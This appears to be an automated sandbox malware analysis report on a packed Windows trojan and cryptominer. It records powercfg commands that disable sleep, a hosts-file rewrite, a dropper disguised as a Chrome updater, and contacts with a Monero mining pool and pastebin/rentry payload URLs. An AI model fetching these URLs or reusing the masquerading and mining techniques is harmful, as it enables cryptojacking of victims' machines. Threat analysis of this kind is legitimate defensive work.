Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Modifies power options to not sleep / hibernate

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0	Jump to behavior
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0	Jump to behavior

Modifies the hosts file

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: explorer.exe, 0000003B.00000002.3836485970.0000000000EA9000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: procexp.exe

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	11 Windows Service	11 Windows Service	1 Masquerading	OS Credential Dumping	321 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Service Execution	1 DLL Side-Loading	311 Process Injection	1 File and Directory Permissions Modification	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	Security Account Manager	131 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	131 Virtualization/Sandbox Evasion	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	311 Process Injection	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	3 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 File Deletion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	61%	ReversingLabs	Win64.Packed.Generic
SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	100%	Avira	TR/Kryptik.ilfwl

Dropped Files

Source	Detection	Scanner	Label
C:\ProgramData\GoogleUP\Chrome\Updater.exe	100%	Avira	TR/Kryptik.ilfwl
C:\ProgramData\GoogleUP\Chrome\Updater.exe	61%	ReversingLabs	Win64.Packed.Generic
C:\Windows\Temp\pjjtwoljkwri.sys	5%	ReversingLabs

Name	IP	Active	Malicious	Reputation
s-part-0039.t-0009.t-msedge.net	13.107.246.67	true	false	unknown
xmr-eu1.nanopool.org	141.94.23.83	true	true	unknown
pastebin.com	104.20.4.235	true	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://pastebin.com/raw/VMnMCaJF	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://rentry.co/y9ce3ing/raw--cinit-stealth-targets=Taskmgr.exe	explorer.exe, 0000003B.00000002.3836485970.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://crl.cloudflare.com/origin_ca.crl7	explorer.exe, 0000003B.00000002.3836485970.0000000000F7D000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://ocsp.cloudflare.com/origin_ca0	explorer.exe, 0000003B.00000002.3836485970.0000000000F7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.3836485970.0000000000F01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.3837102907.00000000019D0000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://crl.cloudflare.com/origin_ca.crl	explorer.exe, 0000003B.00000002.3837102907.00000000019D0000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://ocsp.cloudflare.com/origin_cai	explorer.exe, 0000003B.00000002.3837102907.00000000019D0000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://crl.cloudflare.com/origin_ca.crl0	explorer.exe, 0000003B.00000002.3837102907.00000000019D0000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://rentry.co/y9ce3ing/rawTaskmgr.exe	explorer.exe, 0000003B.00000003.1477292624.0000000000F02000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://crl.cloudflare.com/origin_ca.crl/	explorer.exe, 0000003B.00000002.3836485970.0000000000F01000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://ocsp.cloudflare.com/origin_ca	explorer.exe, 0000003B.00000002.3837102907.00000000019D0000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://rentry.co/y9ce3ing/rawox.dll	explorer.exe, 0000003B.00000003.1503146567.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.3836485970.0000000000F92000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://rentry.co/y9ce3ing/raw	explorer.exe, 0000003B.00000002.3837102907.00000000019D0000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://rentry.co/y9ce3ing/rawc	explorer.exe, 0000003B.00000002.3837102907.00000000019D0000.00000004.00000020.00020000.00000000.sdmp	false	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.20.4.235	pastebin.com	United States	13335	CLOUDFLARENETUS	true
51.89.23.91	unknown	France	16276	OVHFR	true
54.37.137.114	unknown	France	16276	OVHFR	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1543361
Start date and time:	2024-10-27 18:37:16 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	64
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe
Detection:	MAL
Classification:	mal100.troj.adwa.spyw.evad.mine.winEXE@88/13@2/3
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe, PID 7652 because there are no executed function
Execution Graph export aborted for target Updater.exe, PID 6552 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe

Simulations

Behavior and APIs

Time	Type	Description
13:38:21	API Interceptor	1x Sleep call for process: SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe modified
13:38:24	API Interceptor	32x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.20.4.235	gabe.ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	cr_asm_crypter.ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	vF20HtY4a4.exe	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	OSLdZanXNc.exe	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	gaber.ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	cr_asm_crypter.ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	sostener.vbs	Get hash	malicious	Njrat	Browse	pastebin.com/raw/V9y5Q5vv
	sostener.vbs	Get hash	malicious	XWorm	Browse	pastebin.com/raw/V9y5Q5vv
	envifa.vbs	Get hash	malicious	Remcos	Browse	pastebin.com/raw/V9y5Q5vv
	New Voicemail Invoice 64746w .js	Get hash	malicious	WSHRAT	Browse	pastebin.com/raw/NsQ5qTHr
51.89.23.91	eqkh9g37Yb.exe	Get hash	malicious	Xmrig	Browse
54.37.137.114	ft1i6jvAdD.exe	Get hash	malicious	Xmrig	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
xmr-eu1.nanopool.org	Yf4yviDxwF.exe	Get hash	malicious	Xmrig	Browse	54.37.232.103
	file.exe	Get hash	malicious	Xmrig	Browse	54.37.137.114
	Q3Vq6yp33F.exe	Get hash	malicious	Xmrig	Browse	51.15.65.182
	2JkHiPgkLE.exe	Get hash	malicious	Xmrig	Browse	51.15.58.224
	file.exe	Get hash	malicious	Xmrig	Browse	51.89.23.91
	eqkh9g37Yb.exe	Get hash	malicious	Xmrig	Browse	146.59.154.106
	SecuriteInfo.com.Trojan.Siggen29.50366.26295.18671.exe	Get hash	malicious	Xmrig	Browse	51.15.65.182
	SecuriteInfo.com.Trojan.GenericKD.74258817.17122.7170.exe	Get hash	malicious	Vidar, Xmrig	Browse	54.37.232.103
	WWhhc3A0rs.exe	Get hash	malicious	Xmrig	Browse	51.15.65.182
	OTm8DpW32j.exe	Get hash	malicious	Xmrig	Browse	141.94.23.83
s-part-0039.t-0009.t-msedge.net	5Cw7877KPD.dll	Get hash	malicious	CobaltStrike, Metasploit	Browse	13.107.246.67
	http://mychronictravel.eu.org/	Get hash	malicious	Unknown	Browse	13.107.246.67
	https://u47839971.ct.sendgrid.net/ls/click?upn=u001.SS8YqfWjf1b3UNFf2g8-2BbyepSJ9NnVqTjg5p4PlqyZLDG-2F-2FRHUWKB7tpHO-2BD9IAzfDK69NBor6n5GDDWuKOaXjILtpHrb-2FuqosweWIwJauCFjFOIVaIDje-2BTbWeqpid-2Fe0IpJIrTIznxRC8RuWTXkcZZXZKUxIgeeMWOFH96Tjh3a3uDeIXRyoiB6ZRGKZhHD63OuPdyktyTbMDbA-2FurGQ-3D-3DGlRK_1fgoI9z-2BmeHj6kFR5jmXJyN8Vyo9ja5rNrkl1rR8UXAlmAe6PSc2-2FD85CLOIF98tpCjfsSquWpaRYnYzjD-2B-2FDF-2F8BwiwRSEwmTXwwlDUaQI3bDBZTUv-2Ffbse4A61ed6hVc-2BhhTqdpCqzpir5GY49O-2BVdqG9mHEhTR8OvRsDhxES9QAdY7ZiH-2BurXMNUWGL6VuIIVYma05ZXZK6zhQMDhjNBnJShmRWPp7Ow2IJgH96F8uRyUdyMUZ9au5PfRhmvWMnTj3B1KVxYBpNo7XRlBSlYjK74Z4HptPWz0XAvVILLp4Z5Qq7I-2BYF76YXE5ZsE-2F9hOEdmxnqZwZIEaC1BNDg2XB-2BluEEvEXRuR9ohEPc6VObquUxTQmba8bObSY0wG3oOeb2xD8hV6IKwMnr9d-2B5HbQscEqkWH5k7qnk6bAGBIHHNt95VH4uagG-2Bh74PJCdwHqpitEnC4IeAHXNdNtMkKw34-2BF8TeV7q4SmkRwe9osbefOHPWGyls7sZdEjodVX7wlBDRV2BLQlTlDkK-2FzuZ2EsHCtWTv7yrVJT-2B6p3fl4O5qZGyWAuATjn7386SmbgYFZYAIaRjabXb6J3Z9IYhB-2BBiP3zxZSMd-2BGGNtSLCQw7FqwKOUhYoEZSgG-2FLraJhb7xOSF-2FZGKBw-2FWGPQ5W16K6ZnP31akPWN-2FRy3A1tFL9-2FQXaviWuNn8VOeqLfBR9isxQ-2BqB-2Fm-2BPFRMhM4zyM42FPD-2FRIJxCXHHfAnucSqTKeA1iykI89pw6joYB-2B9v-2FXzQpkgszpTxbxZcZ7mH0xUY6S3QZDaIWpt-2F-2B0FpvTn8cArsTTKjQo1QO476bdWvqqoz32vBNn214xuFkN0blGHeazkhMWwmEzZM6r-2BTFrW2-2Fha62dTAc7eNUguY6HOm3gtrj2-2FYlAidnBTp5Y8fj3jmA-3D-3D	Get hash	malicious	Unknown	Browse	13.107.246.67
	Quarantined Messages (1).zip	Get hash	malicious	HTMLPhisher	Browse	13.107.246.67
	Fax_Message_04 September, 202411_21_58 AM_564308269612697.htm	Get hash	malicious	HTMLPhisher	Browse	13.107.246.67
	Inv Confirmation.htm	Get hash	malicious	HTMLPhisher	Browse	13.107.246.67
	SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx	Get hash	malicious	Unknown	Browse	13.107.246.67
	https://8jkfw9cqp7ep.z13.web.core.windows.net/?zpbid=78432_55610c1d-9229-11ef-824f-03718b6de7bb#	Get hash	malicious	HTMLPhisher, TechSupportScam	Browse	13.107.246.67
	EXTERNALRoger Moczygemba shared DIRECT MED CLINIC - CONFIDENTIAL with you.msg	Get hash	malicious	Unknown	Browse	13.107.246.67
	https://1drv.ms/o/c/3e563d3fb2a98d1c/Emlo5KUbYYNEvKtIF-7SS0EBYSeT3hOOGuv_MbeT-n2y4g?e=HPjqUn	Get hash	malicious	HtmlDropper	Browse	13.107.246.67
pastebin.com	seethebestthingstobegetmebackwithherlove.hta	Get hash	malicious	Cobalt Strike	Browse	172.67.19.24
	BL Packing List & Invoice.xls	Get hash	malicious	Unknown	Browse	104.20.4.235
	DHLShippingInvoicesAwbBL000000000102220242247.vbs	Get hash	malicious	Remcos	Browse	104.20.4.235
	a1OueQJq4d.exe	Get hash	malicious	DCRat	Browse	172.67.19.24
	4b7b5bc7b0d1f70adf6b80390f1273723c409b837c957.dll	Get hash	malicious	Unknown	Browse	104.20.4.235
	loader.exe	Get hash	malicious	Xmrig	Browse	104.20.4.235
	SecuriteInfo.com.Win64.Evo-gen.31489.1077.exe	Get hash	malicious	Xmrig	Browse	172.67.19.24
	6TCmDl2rFY.exe	Get hash	malicious	DCRat	Browse	104.20.4.235
	AF1cyL4cv6.vbs	Get hash	malicious	AsyncRAT	Browse	104.20.4.235
	FRi4mYXiwD.ps1	Get hash	malicious	AsyncRAT	Browse	104.20.3.235

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
OVHFR	jklm68k.elf	Get hash	malicious	Unknown	Browse	145.239.88.167
	nabarm5.elf	Get hash	malicious	Unknown	Browse	51.178.70.68
	jklarm5.elf	Get hash	malicious	Unknown	Browse	51.75.252.221
	la.bot.sh4.elf	Get hash	malicious	Unknown	Browse	91.134.89.2
	nshmpsl.elf	Get hash	malicious	Unknown	Browse	51.89.127.38
	nshmips.elf	Get hash	malicious	Unknown	Browse	51.89.127.38
	UwOcZADSmi.exe	Get hash	malicious	AsyncRAT	Browse	51.77.103.216
	la.bot.mipsel.elf	Get hash	malicious	Unknown	Browse	149.202.64.24
	la.bot.mipsel.elf	Get hash	malicious	Unknown	Browse	51.75.252.255
	https://inps-conferma-dati.it/home.html	Get hash	malicious	Unknown	Browse	178.32.138.212
CLOUDFLARENETUS	SecuriteInfo.com.Win64.CrypterX-gen.31361.18171.exe	Get hash	malicious	Unknown	Browse	104.26.0.5
	SecuriteInfo.com.Trojan.TR.Redcap.cdtxw.10783.3124.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	f6ffg1sZS2.exe	Get hash	malicious	Babuk, Djvu	Browse	188.114.96.3
	wo4POc0NG1.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	172.67.170.64
	K3SRs78CAv.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	104.21.95.91
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	LummaC	Browse	104.21.95.91
	file.exe	Get hash	malicious	LummaC	Browse	104.21.95.91
	SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe	Get hash	malicious	LummaC	Browse	104.21.64.165
OVHFR	jklm68k.elf	Get hash	malicious	Unknown	Browse	145.239.88.167
	nabarm5.elf	Get hash	malicious	Unknown	Browse	51.178.70.68
	jklarm5.elf	Get hash	malicious	Unknown	Browse	51.75.252.221
	la.bot.sh4.elf	Get hash	malicious	Unknown	Browse	91.134.89.2
	nshmpsl.elf	Get hash	malicious	Unknown	Browse	51.89.127.38
	nshmips.elf	Get hash	malicious	Unknown	Browse	51.89.127.38
	UwOcZADSmi.exe	Get hash	malicious	AsyncRAT	Browse	51.77.103.216
	la.bot.mipsel.elf	Get hash	malicious	Unknown	Browse	149.202.64.24
	la.bot.mipsel.elf	Get hash	malicious	Unknown	Browse	51.75.252.255
	https://inps-conferma-dati.it/home.html	Get hash	malicious	Unknown	Browse	178.32.138.212

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Windows\Temp\pjjtwoljkwri.sys	Yf4yviDxwF.exe	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse
	SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe	Get hash	malicious	Xmrig	Browse
	prog.exe	Get hash	malicious	Xmrig	Browse
	T52Z708x2p.exe	Get hash	malicious	Phorpiex, Xmrig	Browse
	lJ4EzPSKMj.exe	Get hash	malicious	Phorpiex, Xmrig	Browse
	Us051y7j25.exe	Get hash	malicious	Phorpiex, Xmrig	Browse
	bypass.exe	Get hash	malicious	Xmrig	Browse
	MDE_File_Sample_7046d0b264f80a016ec10158377c7e76c395cffb.zip	Get hash	malicious	Xmrig	Browse
	Q3Vq6yp33F.exe	Get hash	malicious	Xmrig	Browse

Created / dropped Files

C:\ProgramData\GoogleUP\Chrome\Updater.exe

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6031872
Entropy (8bit):	7.948453468363114
Encrypted:	false
SSDEEP:	98304:wKDlzK2disEKWIAN9rDUQ60m+E+3syUSIkJEhxfAF8p4ucxJixyWB5TU7NTJN1uy:waFbErIYeQ3nEIsyU2Y48CBh5TjY
MD5:	C441BE4F7FD0F07FDCF94657C624C3DA
SHA1:	BEDD1F5D2FEB959599B370590F62F02CBB3D2D3F
SHA-256:	47C6484DDE4D9CA23A7667B1B71C5ED88D7CDD3DCCF57485333CEDA0153E5684
SHA-512:	C753BFA2B84EA5DFC47DBE25B807AF6DD7D79E53A780EF693052F0C5C774767EF5B277671B07C539132AF11A56546DE3DD18790CE3FB3C4F66CA63C6C17FD8AD
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 61%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...Z{.f.........."......$....S................@.....................................\...`.....................................................P......,......$...............T............................<..(.......8............@[.X............................text....".......................... ..`.rdata...2...@......................@..@.data...H.O.........................@....pdata.......pQ.....................@..@.00cfg........Q.....................@..@.tls..........Q.....................@....vmp..+.....Q..................... ..`.vmp.......@[.....................@....vmp...XX..P[..ZX.................`..h.reloc..T............dX.............@..@.rsrc...,...........zX.............@..@................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:Nlllul3nqth:NllUa
MD5:	851531B4FD612B0BC7891B3F401A478F
SHA1:	483F0D1E71FB0F6EFF159AA96CC82422CF605FB3
SHA-256:	383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
SHA-512:	A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931
Malicious:	false
Preview:	@...e.................................&..............@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_juwuz4lg.oku.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mwunltw0.udc.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vm0iewqp.uee.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wwzmnsne.emf.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Windows\System32\drivers\etc\hosts

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2748
Entropy (8bit):	4.269302338623222
Encrypted:	false
